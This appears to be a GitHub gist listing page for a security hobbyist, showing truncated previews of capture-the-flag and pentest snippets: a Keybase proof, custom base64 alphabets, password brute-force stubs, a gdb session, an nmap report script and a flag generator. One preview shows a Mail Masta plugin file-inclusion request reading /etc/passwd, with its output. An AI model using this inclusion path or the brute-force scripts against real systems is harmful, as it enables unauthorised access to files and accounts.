I hereby claim:
- I am tunelko on github.
- I am tunelko (https://keybase.io/tunelko) on keybase.
- I have a public key whose fingerprint is A6A5 C4CE AE4F 79A0 0318 6B69 CF4D B1F3 89B4 55C5
To claim this, I am signing this object:
import base64 | |
import sys | |
pt = sys.argv[1] | |
type_encoding = sys.argv[2] | |
atom128 = "/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC" | |
megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5" | |
zong22 = "ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2" | |
hazz15 = "HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5" |
#!/usr/bin/env python | |
import requests | |
import string | |
import re | |
alpha=string.ascii_uppercase+string.ascii_lowercase+string.digits | |
url='http://128.199.96.39/?password=' | |
m = re.compile('invalid [0-9]') | |
password = ['a']*4 |
gdb-peda$ b *0x0000000000400824 | |
Breakpoint 1 at 0x400824 | |
gdb-peda$ disassemble main | |
=> 0x0000000000400824 <+212>: je 0x400855 <main+261> | |
gdb-peda$ run | |
RBX: 0x7fffffffe238 ("TH1S 1s s3cr3t!!") | |
.. | |
.. | |
Breakpoint 1, 0x0000000000400824 in main () |
#!/usr/bin/env python | |
import requests | |
import urllib | |
import base64 | |
import string | |
import sys | |
url='https://webvulnerable07.cybercamp.es:8507/index.php' | |
alpha=string.uppercase+string.lowercase | |
digits=string.digits |
https://webvulnerable05.cybercamp.es:8505/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd | |
root:x:0:0:root:/root:/bin/ash | |
bin:x:1:1:bin:/bin:/sbin/nologin | |
daemon:x:2:2:daemon:/sbin:/sbin/nologin | |
adm:x:3:4:adm:/var/adm:/sbin/nologin | |
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin | |
sync:x:5:0:sync:/sbin:/bin/sync | |
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown | |
halt:x:7:0:halt:/sbin:/sbin/halt | |
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin |
#!/bin/sh | |
# ----------------------------------------------------------------------------- | |
# Author: @tunelko | |
# Modifier: DiaLluvioso | |
# ----------------------------------------------------------------------------- | |
# Useful for pentesting on information gathering phase. | |
# Displays fancy and formatted HTML report generated by xalan. | |
# note: it requires xalan (xml to html converter) but is installed if needed. | |
# ----------------------------------------------------------------------------- | |
# * Change nmap arguments as needed ! |
<?php | |
/** | |
* @package EasySocial | |
* @copyright Copyright (C) 2010 - 2014 Stack Ideas Sdn Bhd. All rights reserved. | |
* @license GNU/GPL, see LICENSE.php | |
* EasySocial is free software. This version may have been modified pursuant | |
* to the GNU General Public License, and as distributed it includes or | |
* is derivative of works licensed under the GNU General Public License or | |
* other free or open source software licenses. | |
* See COPYRIGHT.php for copyright notices and details. |
I hereby claim:
To claim this, I am signing this object:
#!/bin/bash | |
for flags in {1..45}; do echo "$flags: $(openssl rand -hex 16)" >> passwords && for lines in $(cut -f 2 -d ":" passwords); do echo "flag{$lines}" > /home/reto/flag_$flags.txt; done;done |